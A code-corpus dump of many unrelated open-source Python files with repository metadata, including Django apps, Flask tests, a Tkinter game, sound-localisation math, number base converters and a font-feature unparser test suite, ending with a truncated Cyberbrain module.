] | permissive | HBinhCT/Q-project | 0f80cd15c9945c43e2e17072416ddb6e4745e7fa | 19923cbaa3c83c670527899ece5c3ad31bcebe65 | refs/heads/master | 2023-08-30T08:59:16.006567 | 2023-08-29T15:30:21 | 2023-08-29T15:30:21 | 247,630,603 | 8 | 1 | MIT | 2020-07-22T01:20:23 | 2020-03-16T06:48:02 | Python | UTF-8 | Python | false | false | 875 | py | """
# Sample code to perform I/O:
name = input() # Reading input from STDIN
print('Hi, %s.' % name) # Writing output to STDOUT
# Warning: Printing unwanted or ill-formatted data to output will cause the test cases to fail
"""
# Write your code here
from collections import defaultdict
t = int(input())
for _ in range(t):
l = input().strip()
count_a = count_b = count_c = 0
delta_patterns = defaultdict(int)
delta_patterns[(0, 0)] = 1
for c in l:
if c == 'a':
count_a += 1
elif c == 'b':
count_b += 1
elif c == 'c':
count_c += 1
combine = (count_a - count_b, count_a - count_c)
delta_patterns[combine] += 1
result = 0
for count in delta_patterns.values():
if count > 1:
result += (count - 1) * count // 2
print(result)
| [
"hbinhct@gmail.com"
] | hbinhct@gmail.com |
1c81f2b5373941ff4b3cacc4269d00c333b9dfab | 09aee268ce72d282f53fe94f42478e2b3b48127d | /PracticemodelformProject/testapp/admin.py | 204fdaf32620f4860c87848b9f5ccbbb2094de3c | [] | no_license | keshava519/Django_Projects | c95d0f8c55d4cc946291be6fb058b7298aefe596 | 99584892b9d9ec6b6395a382c684b4d036d07874 | refs/heads/main | 2023-02-23T03:44:32.110742 | 2021-01-27T15:15:13 | 2021-01-27T15:15:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 213 | py | from django.contrib import admin
from testapp.models import Student
# Register your models here.
class StudentAdmin(admin.ModelAdmin):
list_display=['name','marks']
admin.site.register(Student,StudentAdmin)
| [
"keshava.cadcam@gmail.com"
] | keshava.cadcam@gmail.com |
53410072ce6d7e6b0748d3be7521fbceb1cb762d | 0bdfefad123a03754713c64582a3986bd26965bd | /tests/test_user.py | 5f947fd39d6c494f18bedaa1ea4c80ede89935a6 | [] | no_license | Kennedy128/pitch-survey | 889d7747139b88df76bfb09d8801d83cf05063b7 | f6c0cb8ab8a57ba4b59b53a8a6092d0c023dc8e5 | refs/heads/master | 2022-05-29T07:46:54.391714 | 2020-05-05T23:05:00 | 2020-05-05T23:05:00 | 260,503,908 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,175 | py | import unittest
from app.models import User
from app import db
class UserModelTest(unittest.TestCase):
def setUp(self):
self.new_user = User(username = "kennedy", email ="kennedymbithi12@gmail.com", bio = "I am incredible", profile_pic_url = "image_url", password = 'kenny', id = 1 )
def tearDown(self):
User.query.delete()
def test_save_user(self):
self.new_user.save_user()
self.assertTrue(len(User.query.all())>0)
def test_password_setter(self):
self.assertTrue(self.new_user.pass_secure is not None)
def test_no_access_password(self):
with self.assertRaises(AttributeError):
self.new_user.password
def test_password_verification(self):
self.assertTrue(self.new_user.verify_password('Kennedy'))
def test_check_instance_variables(self):
self.assertEquals(self.new_user.username, 'kennedy')
self.assertEquals(self.new_user.email, 'kennedymbithi12@gmail.com')
self.assertEquals(self.new_user.bio, 'I am incredible')
self.assertEquals(self.new_user.profile_pic_url, 'image_url')
self.assertEquals(self.new_user.password,'kenny' ) | [
"santa@northpole.com"
] | santa@northpole.com |
b5d963da42ff8506f0eeb54936e68ed7926e4e90 | 6923f79f1eaaba0ab28b25337ba6cb56be97d32d | /BuildingMachineLearningSystemsWithPython/ch01/gen_webstats.py | fa133d769a16dc477cbbb22ac4d2ba34f9a13a27 | [] | no_license | burakbayramli/books | 9fe7ba0cabf06e113eb125d62fe16d4946f4a4f0 | 5e9a0e03aa7ddf5e5ddf89943ccc68d94b539e95 | refs/heads/master | 2023-08-17T05:31:08.885134 | 2023-08-14T10:05:37 | 2023-08-14T10:05:37 | 72,460,321 | 223 | 174 | null | 2022-10-24T12:15:06 | 2016-10-31T17:24:00 | Jupyter Notebook | UTF-8 | Python | false | false | 1,289 | py | # This code is supporting material for the book
# Building Machine Learning Systems with Python
# by Willi Richert and Luis Pedro Coelho
# published by PACKT Publishing
#
# It is made available under the MIT License
# This script generates web traffic data for our hypothetical
# web startup "MLASS" in chapter 01
import os
import scipy as sp
from scipy.stats import gamma
import matplotlib.pyplot as plt
from utils import DATA_DIR, CHART_DIR
sp.random.seed(3) # to reproduce the data later on
x = sp.arange(1, 31 * 24)
y = sp.array(200 * (sp.sin(2 * sp.pi * x / (7 * 24))), dtype=int)
y += gamma.rvs(15, loc=0, scale=100, size=len(x))
y += 2 * sp.exp(x / 100.0)
y = sp.ma.array(y, mask=[y < 0])
print(sum(y), sum(y < 0))
plt.scatter(x, y)
plt.title("Web traffic over the last month")
plt.xlabel("Time")
plt.ylabel("Hits/hour")
plt.xticks([w * 7 * 24 for w in [0, 1, 2, 3, 4]], ['week %i' % (w + 1) for w in
[0, 1, 2, 3, 4]])
plt.autoscale(tight=True)
plt.grid()
plt.savefig(os.path.join(CHART_DIR, "1400_01_01.png"))
# sp.savetxt(os.path.join("..", "web_traffic.tsv"),
# zip(x[~y.mask],y[~y.mask]), delimiter="\t", fmt="%i")
sp.savetxt(os.path.join(
DATA_DIR, "web_traffic.tsv"), list(zip(x, y)), delimiter="\t", fmt="%s")
| [
"bb@b.om"
] | bb@b.om |
19bc27f2d36f6218270c1f5123559fb259030256 | c924753b19bc892f9b756483f080cd8a69f22dec | /tests/test_unparse_sub.py | 314d51de3b294148efc0fee5782aec2767c3f5e2 | [
"BSD-3-Clause"
] | permissive | mbrukman/fontFeatures | 21a65190aea163174486d026627b7a87a2e3fa20 | 9c33517571d9870e536dea005f7387f52b3fc967 | refs/heads/master | 2023-03-07T02:41:37.527028 | 2021-02-16T22:45:47 | 2021-02-16T22:45:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,808 | py | from fontFeatures import Substitution, FontFeatures
from fontTools.ttLib import TTFont
from fontFeatures.ttLib.GSUBUnparser import GSUBUnparser
from fontFeatures.ttLib import unparseLanguageSystems
import pprint
import unittest
class TestUnparse(unittest.TestCase):
font = TTFont("fonts/Amiri-Regular.ttf")
lookups = font["GSUB"].table.LookupList.Lookup
ff = FontFeatures()
unparser = GSUBUnparser(font["GSUB"], ff, [])
def test_single(self):
g, _ = self.unparser.unparseLookup(self.lookups[1], 1) # part of locl
self.assertEqual(g.rules[0].asFea(), "sub period by period.ara;")
self.assertEqual(g.rules[1].asFea(), "sub guillemotleft by guillemotleft.ara;")
def test_ligature(self):
g, _ = self.unparser.unparseLookup(self.lookups[0], 0) # part of ccmp
self.assertEqual(g.rules[0].asFea(), "sub uni0627 uni065F by uni0673;")
def test_multiple(self):
g, _ = self.unparser.unparseLookup(self.lookups[10], 10)
self.assertEqual(g.rules[0].asFea(), "sub uni08B6 by uni0628 smallmeem.above;")
def test_ignore(self):
g, _ = self.unparser.unparseLookup(self.lookups[48], 48)
self.assertEqual(
g.rules[0].asFea(),
"ignore sub [uni0622 uni0627 uni0648 uni0671 uni0627.fina uni0671.fina] uni0644.init' uni0644.medi' [uni0647.fina uni06C1.fina];",
)
def test_chaining(self):
self.unparser.unparseLookups()
g, _ = self.unparser.unparseLookup(
self.lookups[33], 33
) # part of calt in quran.fea
self.unparser.resolve_routine(g)
self.assertEqual(
g.rules[0].asFea(),
"sub uni0644' lookup SingleSubstitution32 uni0621' lookup SingleSubstitution31 uni0627' lookup SingleSubstitution32;",
)
| [
"simon@simon-cozens.org"
] | simon@simon-cozens.org |
3595f3dc264996d3f27dba5091335b3d7999d3c1 | 70fccf84f1f8dbca2d289e4c983a45b6d715f5df | /utils/prob.py | 912341c94261659e690a170ee4c042f344caaa69 | [] | no_license | SensorsAudioINI/SpikeSeparation | ca05b4e08e90127bf82226ebc4ba6d7a0618ec94 | 6807b0914d90f6ae66e550be9ad50483b9c3d983 | refs/heads/master | 2021-03-30T17:47:27.209746 | 2020-04-03T14:42:46 | 2020-04-03T14:42:46 | 122,992,649 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,844 | py | from __future__ import division
from scipy.stats import norm
import warnings
import numpy as np
import progressbar
from matplotlib import pyplot
index_angles_01 = np.array([[12, 0], [11, -30], [9, -90], [8, -60], [4, 60], [3, 90], [1, 30]])
index_angles_02 = np.array([[1, 30], [2, 60], [3, 90], [4, 120], [5, 150], [6, 180], [7, 210], [8, 240], [9, 270],
[10, 300], [11, 330], [12, 0]])
def get_estimates(itds, initial_estimate, transition_probabilities, itd_dict, prior, save_to_file=None, verbose=False):
"""Implements the basic probabilistic model.
Args:
:param itds: The itds as a numpy array, of dtype np.float32, in seconds.
:param initial_estimate: The initial estimate as numpy array of size num_possible_locations. Note that the array
should be a valid probability distribution, so should sum upto 1.
:param transition_probabilities: The transition probabilities, as a numpy 2D array. Again, the rows must be
valid probability distributions.
:param itd_dict: The itd mapping between the quantized itds and their indices in array format.
:param prior: The prior distributions, as numpy 2D array, rows should be valid probability distributions.
:param save_to_file: If not None, filename is expected, to which the estimates and argmax_estimates are saved.
:param verbose: If True, then a progressbar display of the progress will be displayed.
Returns:
:return: A tuple (estimates, argmax_estimates)
estimates: A numpy 2D array, with the probability estimates at every itd.
argmax_estimates: A numpy array, with the argmax of the probability estimate at every itd.
"""
localization_estimate = initial_estimate
num_itds = len(itds)
estimates = np.zeros(shape=(num_itds, prior.shape[0]), dtype=np.float32)
argmax_estimates = np.zeros(shape=num_itds, dtype=np.int32)
bar = progressbar.ProgressBar() if verbose else identity
for itd_idx, itd in bar(enumerate(itds)):
position_matrix = np.multiply(transition_probabilities, localization_estimate)
position_probability = np.sum(position_matrix, axis=1)
motion_probability = np.array([prior[idx][np.argmin(np.abs(itd_dict - itd))] for idx in range(prior.shape[0])])
probability_to_normalize = np.multiply(motion_probability, position_probability)
localization_estimate = probability_to_normalize / sum(probability_to_normalize)
estimates[itd_idx] = localization_estimate
argmax_estimates[itd_idx] = np.argmax(localization_estimate)
if np.isnan(np.sum(localization_estimate)):
warnings.warn('Something wrong with the estimate.')
if save_to_file is not None:
np.savez(save_to_file, estimates=estimates, argmax_estimates=argmax_estimates)
return np.array(estimates, dtype=np.float32), np.array(argmax_estimates, dtype=np.float)
def get_priors(itd_streams, max_itd=800e-6, num_bins=80, save_to_file=None):
"""Calculate prior distributions based on separated itd_streams.
Args:
:param itd_streams: A list of separated itd streams, one for each discrete location.
:param max_itd: The max_itd parameter for the itd algorithm, in seconds.
:param num_bins: The number of bins the itds are quantized into.
:param save_to_file: If not None, filename is expected, to which the prior distribution is saved.
Returns:
:return: The priors, a 2D numpy array, with each row corresponding to a location.
"""
priors = np.zeros(shape=(len(itd_streams), num_bins), dtype=np.float32)
for idx, itd_stream in enumerate(itd_streams):
hist = np.histogram(itd_stream, bins=num_bins, range=(-max_itd, max_itd))[0] / len(itd_stream)
priors[idx] = hist
if save_to_file is not None:
np.save(save_to_file, priors)
return priors
def get_transition_probabilities(index_angles=index_angles_01, sigma=5):
"""Get Gaussian transition probabilities based on angles and a given sigma.
Args:
:param index_angles: The list of tuples with location index and the corresponding angle.
:param sigma: The sigma for the Gaussian distributions.
Returns:
:return: A numpy 2D array.
"""
transition_probabilities = np.zeros(shape=(len(index_angles), len(index_angles)), dtype=np.float32)
angles_original = index_angles[:, 1]
angles = np.sort(angles_original)
for angle_index, index_angle in enumerate(index_angles):
mean = index_angle[1]
angle_distribution = norm(mean, sigma).pdf(angles)
angle_dict = {}
for idx, angle in enumerate(angles):
angle_dict[angle] = angle_distribution[idx]
angle_distribution = [angle_dict[angle] for angle in angles_original]
transition_probabilities[angle_index] = angle_distribution
return transition_probabilities
def moving_average(estimates, window_length=10):
"""Implements moving window average to smoothen the estimates.
Args:
:param estimates: The estimates from the probabilistic model.
:param window_length: The window length for the smoothing.
Returns:
:return: The smoothed estimates, as a numpy array.
"""
averaged_estimates = np.zeros_like(estimates)
for idx in range(len(estimates) - window_length + 1):
averaged_estimates[idx] = np.mean(estimates[idx:idx + window_length], axis=0)
for idx in range(len(estimates) - window_length + 1, len(estimates)):
averaged_estimates[idx] = averaged_estimates[len(estimates) - window_length]
return averaged_estimates
def identity(x):
return x
def get_kalman_estimates(itds, h_k=-178., r_k=210. ** 2, f_k=1., q_k=(0.05) ** 2,
init_state=np.array(0), init_var_state=np.array(0) ** 2,
version='basic', itd_shift=37.20):
itds = itds * 1e6 + itd_shift
estimates, variances = [], []
x_k_k = init_state
p_k_k = init_var_state
for itd in itds:
x_k_km = f_k * x_k_k
p_k_km = f_k * p_k_k * f_k + q_k
y_k = itd - h_k * x_k_km
s_k = r_k + h_k * p_k_km * h_k
k_k = p_k_km * h_k / s_k
x_k_k = x_k_km + k_k * y_k
p_k_k = p_k_km - k_k * h_k * p_k_km
y_k_k = itd - h_k * x_k_k
estimates.append(x_k_k)
variances.append(p_k_k)
return np.array(estimates), np.array(variances)
if __name__ == '__main__':
test_index_angles = np.array([[12, 0], [11, -30], [9, -90], [8, -60], [4, 60], [3, 90], [1, 30]])
test_transition_probabilities = get_transition_probabilities(test_index_angles, sigma=5)
pyplot.imshow(test_transition_probabilities, aspect='auto', interpolation='nearest')
pyplot.show()
print('Hello world, nothing to test for now.')
| [
"enea.ceolini@gmail.com"
] | enea.ceolini@gmail.com |
8a76865e6a5cdbbe7fa9df6795eea725d172e6c9 | 1bbead5d97a279383ae9ae6e4ee70af5d69f1e92 | /tokipona1000/init_conll.py | e9dc534168a128e9f2bcd38130063f4255f8815c | [] | no_license | m-rey/tokipona-corpus-collection | de948540b5045477418b88b0fc9594794cb5f921 | fd8988273f6dfbdad4aaffc12447d0e63284e5d0 | refs/heads/main | 2023-09-05T01:33:39.482149 | 2021-11-20T17:55:34 | 2021-11-20T17:55:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 551 | py | from ilonimi.normalizer import Normalizer
from ilonimi.tokenizer import Tokenizer
def main():
normalizer = Normalizer()
tokenizer = Tokenizer()
with open('tokipona1000.txt') as f:
for i, x in enumerate(f):
x = x.strip()
x = normalizer(x)
x = tokenizer(x)
print('# {}: {}'.format(i + 1, x))
for k, w in enumerate(x.split()):
print('{} {} {} {} {}'.format(k + 1, w, 'X', '0', 'x'))
print('')
if __name__ == '__main__':
#main()
pass
| [
"nymwa0@gmail.com"
] | nymwa0@gmail.com |
acc4b47ecab5e6f2765e24d3ccdf1f6b96e4655a | a797793842f433251d2ab0bafb0ebe800b89a076 | /rulet.py | 8d79359d829dea8fd95428ecdf71213eb4e4120b | [] | no_license | irhadSaric/Instrukcije | b2f576bceb7e75f5fa65bfef99c9cde53d597b32 | 9ac8979b824babdeef3712ab9d23c764536d57b0 | refs/heads/master | 2020-09-28T09:00:08.389651 | 2020-02-01T20:33:59 | 2020-02-01T20:33:59 | 226,740,846 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | import random
# hocu da igram 10000 puta rulet
# svaki od tih 10000 puta cu birati random broj na ruletu
# koja je vjrv da cu dobiti
# najveci na ruletu broj : 36
brojiPobjede = 0
for i in range(10000):
mojBroj = random.randint(0, 36)
ruletovBroj = random.randint(0, 36)
if mojBroj == ruletovBroj:
brojiPobjede += 1
print(brojiPobjede / 10000) | [
"irhad.saric@hotmail.com"
] | irhad.saric@hotmail.com |
7500539e4b77c87262170eb516cec1aceeee07e0 | f00ad57c98e554470a72511dda7a7bfd160aca19 | /linear_structure/stack/number_converter.py | c3c80bda42a7c14c042346c0ebb05009899d9057 | [] | no_license | fanzhangg/algorithm-problems | d60115210aaaffcd094b34b9db5b46dadf93fe9e | 43b111ad625f197ba0905abceab9ee4484284e08 | refs/heads/master | 2021-07-12T20:24:46.265700 | 2020-07-06T17:58:31 | 2020-07-06T17:58:31 | 171,220,135 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,684 | py | from stack import Stack
def dec_to_bin(num: int) -> str:
"""
Convert integer values into binary numbers
Algorithm: Divided By 2
- Start with an integer greater than 0
- Continuously divide the number by 2 and keep track of the reminder
- the reversed string of reminders is the binary string
i.e. The binary string of 233 is 11101001
1 | 233
0 | 116
0 | 58
1 | 29
0 | 14
1 | 7
1 | 3
1 | 1
0
"""
stack = Stack()
while num != 0:
reminder = num % 2
stack.push(reminder)
num = num // 2
bin_str = ""
while not stack.isempty():
bin_digit = stack.pop()
bin_str = "".join((bin_str, str(bin_digit)))
return bin_str
def dec_to_hex(num: int) -> str:
"""
Convert a decimal number to hexadecimal string
:param num: a decimal number
:return: a hexadecimal string (A for 10, B for 11, ...)
"""
stack = Stack()
hex_str = ""
digits = "0123456789ABCDEF"
while num != 0:
reminder = num % 16
stack.push(reminder)
num = num // 16
while not stack.isempty():
digit = stack.pop()
hex_str = "".join((hex_str, digits[digit]))
return hex_str
def dec_to_oct(num: int) -> str:
"""
Convert a decimal number to a octal string
"""
stack = Stack()
oct_str = ""
while num != 0:
reminder = num % 8
stack.push(reminder)
num = num // 8
while not stack.isempty():
digit = stack.pop()
oct_str = "".join((oct_str, str(digit)))
return oct_str
if __name__ == "__main__":
print(dec_to_oct(25))
print(dec_to_hex(256))
| [
"vanadiumzhang@gmail.com"
] | vanadiumzhang@gmail.com |
5c09566cc272f32a6131fcd7db6e831101f055f0 | add74ecbd87c711f1e10898f87ffd31bb39cc5d6 | /xcp2k/classes/_print13.py | a7e6fa4811794eca39b339bb74efedcf02cf7cbe | [] | no_license | superstar54/xcp2k | 82071e29613ccf58fc14e684154bb9392d00458b | e8afae2ccb4b777ddd3731fe99f451b56d416a83 | refs/heads/master | 2021-11-11T21:17:30.292500 | 2021-11-06T06:31:20 | 2021-11-06T06:31:20 | 62,589,715 | 8 | 2 | null | null | null | null | UTF-8 | Python | false | false | 709 | py | from xcp2k.inputsection import InputSection
from xcp2k.classes._program_run_info9 import _program_run_info9
from xcp2k.classes._temperature_colvar1 import _temperature_colvar1
from xcp2k.classes._colvar1 import _colvar1
from xcp2k.classes._hills1 import _hills1
class _print13(InputSection):
def __init__(self):
InputSection.__init__(self)
self.PROGRAM_RUN_INFO = _program_run_info9()
self.TEMPERATURE_COLVAR = _temperature_colvar1()
self.COLVAR = _colvar1()
self.HILLS = _hills1()
self._name = "PRINT"
self._subsections = {'PROGRAM_RUN_INFO': 'PROGRAM_RUN_INFO', 'TEMPERATURE_COLVAR': 'TEMPERATURE_COLVAR', 'COLVAR': 'COLVAR', 'HILLS': 'HILLS'}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
7bf3cd6349e900045b70d5067d841f9c263f9e28 | 318013ccb8738ace0ec72965dac0a3e3fe2fecad | /venv/bin/rst2man.py | 349d495c52f4ce4e924826a8e3e02475f3a96e78 | [] | no_license | nahyunkwon/Processing-3DImages | 792deafbd1a607af8cae439b5d7ab81f772f6653 | bde217aad08dd911ae8125edeae42f7b674614f2 | refs/heads/master | 2023-01-02T10:29:41.325974 | 2020-11-01T19:02:19 | 2020-11-01T19:02:19 | 299,133,212 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 633 | py | #!/Users/kwon/PycharmProjects/3D_A2I/venv/bin/python
# Author:
# Contact: grubert@users.sf.net
# Copyright: This module has been placed in the public domain.
"""
man.py
======
This module provides a simple command line interface that uses the
man page writer to output from ReStructuredText source.
"""
import locale
try:
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
from docutils.writers import manpage
description = ("Generates plain unix manual documents. " + default_description)
publish_cmdline(writer=manpage.Writer(), description=description)
| [
"skgus2624@gmail.com"
] | skgus2624@gmail.com |
ab48adc1e062d9080c5cb2145e3c5b78a51ebdd6 | f6078890ba792d5734d289d7a0b1d429d945a03a | /mid-term/chapmanbrendan/chapmanbrendan_26691_1312276_Q3.py | 299fe01f6c53025391c5faf4bf7e5800e3c4c29f | [] | no_license | huazhige/EART119_Lab | 1c3d0b986a0f59727ee4ce11ded1bc7a87f5b7c0 | 47931d6f6a2c7bc053cd15cef662eb2f2027712c | refs/heads/master | 2020-05-04T23:40:53.709217 | 2019-06-11T18:30:45 | 2019-06-11T18:30:45 | 179,552,067 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,818 | py | # -*- coding: utf-8 -*-
"""
Created on Wed May 8 08:24:43 2019
@author: blchapma
"""
#============================================================================
"Packages"
#============================================================================
import numpy as np
import matplotlib.pyplot as plt
#============================================================================
"Variables"
#============================================================================
mData = np.loadtxt('E:\EAR119\Python Scripts\midterm_dydx.txt').T
a_t, a_y = mData[0], mData[1]
#===================================================================================
# derivatives
#===================================================================================
N = len( a_t)
dt = a_t[1]-a_t[0]
a_vel = (a_y[2::] - a_y[0:-2])/(2*dt)
a_acc = (a_y[2::] - 2*a_y[1:-1] + a_y[0:-2])/(dt**2)
# add zeros at beginning and end for plotting purposes
a_vel = np.hstack( (0,a_vel, 0))
a_acc = np.hstack( (0,a_acc, 0))
for i in range( 1, N-1):
a_vel[i] = ( a_y[i+1] - a_y[i-1])/(2*dt)
a_acc[i] = ( a_y[i+1] - 2*a_y[i] + a_y[i-1])/(dt**2)
else: # vectorized solution
y = 0
# From Week 2:
i = 1
while y[i] > y[i-1]:
largest_height = y[i]
i += 1
#===================================================================================
# plots
#===================================================================================
t_maxHeight = a_t[i]
print "The largest height achieved was %f m" % (largest_height), ' at t =', t_maxHeight
# We might also like to plot the path again just to compare
plt.figure()
plt.subplot( 311)
plt.plot( a_t, a_y)
plt.plot( [t_maxHeight], a_y[a_t == t_maxHeight], 'r*')
plt.ylabel('Height (m)')
plt.grid( True)
plt.subplot( 312)
# skip zeros and beginning and end
plt.plot( a_t[1:-1], a_vel[1:-1])
# peak height at v = 0
plt.plot( [t_maxHeight], a_vel[a_t == t_maxHeight], 'r*')
plt.ylabel('Velocity (m/s)')
plt.grid( True)
plt.subplot( 313)
# skip zeros and beginning and end
plt.plot( a_t[1:-1], a_acc[1:-1])
plt.xlabel('Time (s)')
plt.ylabel('Acceleration (m/s2)')
plt.ylim( -g - 5, -g+5)
plt.grid( True)
plt.show()
#============================================================================
"Image"
#============================================================================
plt.savefig("Q1", dpi=None, facecolor='w', edgecolor='w',
orientation='portrait', papertype=None, format="PNG",
transparent=False, bbox_inches=None, pad_inches=0.1,
frameon=None, metadata=None)
plt.show()
#============================================================================ | [
"hge2@ucsc.edu"
] | hge2@ucsc.edu |
1b84faef65cc22245c96450dcbadae2ec6e81808 | 05725c7af76fd87d94cf424ef7d66efa50ac0bae | /mysite/exam/migrations/0008_auto_20200529_0948.py | 0d2407fdaef56b2c25e7ab300a64fb37490869b2 | [] | no_license | zhuzemin/questionnaire | 759ff2a9f14062f4cc03782269e8c17222a5b778 | 473a17bb0eb6fadeef0884df61d456d8bbb43259 | refs/heads/master | 2022-11-07T08:32:42.741511 | 2020-07-01T07:04:24 | 2020-07-01T07:04:24 | 276,302,646 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 757 | py | # Generated by Django 3.0.6 on 2020-05-29 01:48
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('exam', '0007_exam_status'),
]
operations = [
migrations.AddField(
model_name='exam',
name='finishTime',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='exam',
name='startTime',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='exam',
name='logtime',
field=models.DateTimeField(default=django.utils.timezone.now),
),
]
| [
"gogs@fake.local"
] | gogs@fake.local |
ac5ba21305a500a9b7671ef57166bd48d55276cc | 93e5b82332af9f0d3e203d086e30794fb90a2086 | /ForKids/appendixb/ch14-game-over.py | 474538652bae3b7192201c20d918b5c516da7d26 | [] | no_license | swell1009/ex | cfaae0b5fe917f12416170dce60f7dea8194f368 | 29b274fb51adbdc43af6ebecaec89c97bc58be6f | refs/heads/master | 2020-04-04T10:15:20.578932 | 2018-11-22T06:27:30 | 2018-11-22T06:27:30 | 155,848,187 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,701 | py | from tkinter import *
import random
import time
class Ball:
def __init__(self, canvas, paddle, color):
self.canvas = canvas
self.paddle = paddle
self.id = canvas.create_oval(10, 10, 25, 25, fill=color)
self.canvas.move(self.id, 245, 100)
starts = [-3, -2, -1, 1, 2, 3]
random.shuffle(starts)
self.x = starts[0]
self.y = -3
self.canvas_width = self.canvas.winfo_width()
self.canvas_height = self.canvas.winfo_height()
self.hit_bottom = False
def hit_paddle(self, pos):
paddle_pos = self.canvas.coords(self.paddle.id)
if pos[2] >= paddle_pos[0] and pos[0] <= paddle_pos[2]:
if pos[3] >= paddle_pos[1] and pos[3] <= paddle_pos[3]:
return True
return False
def draw(self):
self.canvas.move(self.id, self.x, self.y)
pos = self.canvas.coords(self.id)
if pos[1] <= 0:
self.y = 3
if self.hit_paddle(pos) == True:
self.y = -3
if pos[3] >= self.canvas_height:
self.hit_bottom = True
if pos[0] <= 0:
self.x = 3
if pos[2] >= self.canvas_width:
self.x = -3
class Paddle:
def __init__(self, canvas, color):
self.canvas = canvas
self.id = canvas.create_rectangle(0, 0, 100, 10, fill=color)
self.canvas.move(self.id, 200, 300)
self.x = 0
self.canvas_width = self.canvas.winfo_width()
self.started = False
self.canvas.bind_all('<KeyPress-Left>', self.turn_left)
self.canvas.bind_all('<KeyPress-Right>', self.turn_right)
self.canvas.bind_all('<Button-1>', self.start_game)
def draw(self):
self.canvas.move(self.id, self.x, 0)
pos = self.canvas.coords(self.id)
if pos[0] <= 0:
self.x = 0
elif pos[2] >= self.canvas_width:
self.x = 0
def turn_left(self, evt):
self.x = -2
def turn_right(self, evt):
self.x = 2
def start_game(self, evt):
self.started = True
tk = Tk()
tk.title("Game")
tk.resizable(0, 0)
tk.wm_attributes("-topmost", 1)
canvas = Canvas(tk, width=500, height=400, bd=0, highlightthickness=0)
canvas.pack()
tk.update()
paddle = Paddle(canvas, 'blue')
ball = Ball(canvas, paddle, 'red')
game_over_text = canvas.create_text(250, 200, text='GAME OVER', state='hidden')
while 1:
if ball.hit_bottom == False and paddle.started == True:
ball.draw()
paddle.draw()
if ball.hit_bottom == True:
time.sleep(1)
canvas.itemconfig(game_over_text, state='normal')
tk.update_idletasks()
tk.update()
time.sleep(0.01)
| [
"swell1009@qq.com"
] | swell1009@qq.com |
230c7858868fd3f749ca0b020713498141986b25 | 9043da349ef0dde4cb6d819a69992274cac99125 | /app/views.py | 18d64f925ce07f531d717d8d30d40975dc5db33a | [] | no_license | zcoder/cantailme-server | e78529f5fa554ff2979215f21089068629aa1259 | 3940c4177ecca43aa78040b129aa29327a466c29 | refs/heads/master | 2021-01-16T21:07:35.372771 | 2012-07-10T18:17:40 | 2012-07-10T18:17:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | from django.shortcuts import get_object_or_404
from annoying.decorators import render_to
from app.models import TailSession
@render_to('app/index.html')
def index(request):
"""Index page"""
return {}
@render_to('app/tail.html')
def tail(request, hash):
"""Display by hash"""
return {
'session': get_object_or_404(TailSession, hash=hash),
}
| [
"nvbn.rm@gmail.com"
] | nvbn.rm@gmail.com |
fb683de87b440fb79e7283fcdf4f67d2062f4338 | c4f0a0215956ff0c29ae491a10416a72c1ce654d | /nails_project/nails_project/accounts/urls.py | d27edda41f2e3ed2b138980e290a802ebb7219da | [] | no_license | borislavstoychev/my_exam | 1a2a499b2e6ac507641a9aad76576d49d4ac6a6d | 9c756f76679ad85697ff123c478b765656d4ce2d | refs/heads/main | 2023-07-13T12:49:40.116891 | 2021-08-25T08:54:44 | 2021-08-25T08:54:44 | 380,476,519 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 556 | py | from django.urls import path
from nails_project.accounts import views
urlpatterns = (
path('sign-in/', views.SignInView.as_view(), name='sign in user'),
path('sign-out/', views.SignOutView.as_view(), name='sign out user'),
path('sign-up/', views.SignUpView.as_view(), name='sign up user'),
path('profile/<int:pk>/', views.ProfileUpdateView.as_view(), name='profile details'),
path('delete/<int:pk>/', views.ProfileDeleteView.as_view(), name='profile delete'),
path('activate/<uidb64>/<token>/', views.activate, name='activate'),
)
| [
"stoy4ew@gmail.com"
] | stoy4ew@gmail.com |
408b2759512d27d6ac6c858cf465b57ebc6a92ae | b67bcff47ed23af86edc27ea8bf8c4b24fd67434 | /cyberbrain/basis.py | 2c5bd59854b426b16202b843f6886116a431ef98 | [
"MIT"
] | permissive | vvoody/Cyberbrain | 3f0f0f671f18377566f32f5f5381ac9ab4a61bb9 | bac343b6e596d270d152e345ee74c2d0b8d265a2 | refs/heads/master | 2020-08-24T02:36:31.111072 | 2019-10-21T07:04:43 | 2019-10-21T07:04:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,940 | py | """Some basic data structures used throughout the project."""
from collections import defaultdict
from enum import Enum
from typing import Dict, NamedTuple, Tuple, Union
# "surrounding" is a 2-element tuple (start_lineno, end_lineno), representing a
# logical line. Line number is frame-wise.
#
# For single-line statement, start_lineno = end_lineno, and is the line number of the
# physical line returned by get_lineno_from_lnotab.
#
# For multiline statement, start_lineno is the line number of the first physical line,
# end_lineno is the last. Lines from start_lineno to end_lineno -1 should end with
# token.NL(or tokenize.NL before 3.7), line end_lineno should end with token.NEWLINE.
#
# Example:
# 0 a = true
# 1 a = true
# 2 b = {
# 3 'foo': 'bar'
# 4 }
# 5 c = false
#
# For the assignment of b, start_lineno = 2, end_lineno = 4
Surrounding = NamedTuple("Surrounding", [("start_lineno", int), ("end_lineno", int)])
SourceLocation = NamedTuple("SourceLocation", [("filepath", str), ("lineno", int)])
_dummy = object()
class NodeType(Enum):
"""Just node types."""
LINE = 1
CALL = 2
class FrameID:
"""Class that represents a frame.
Basically, a frame id is just a tuple, where each element represents the frame index
within the same parent frame. For example, consider this snippet:
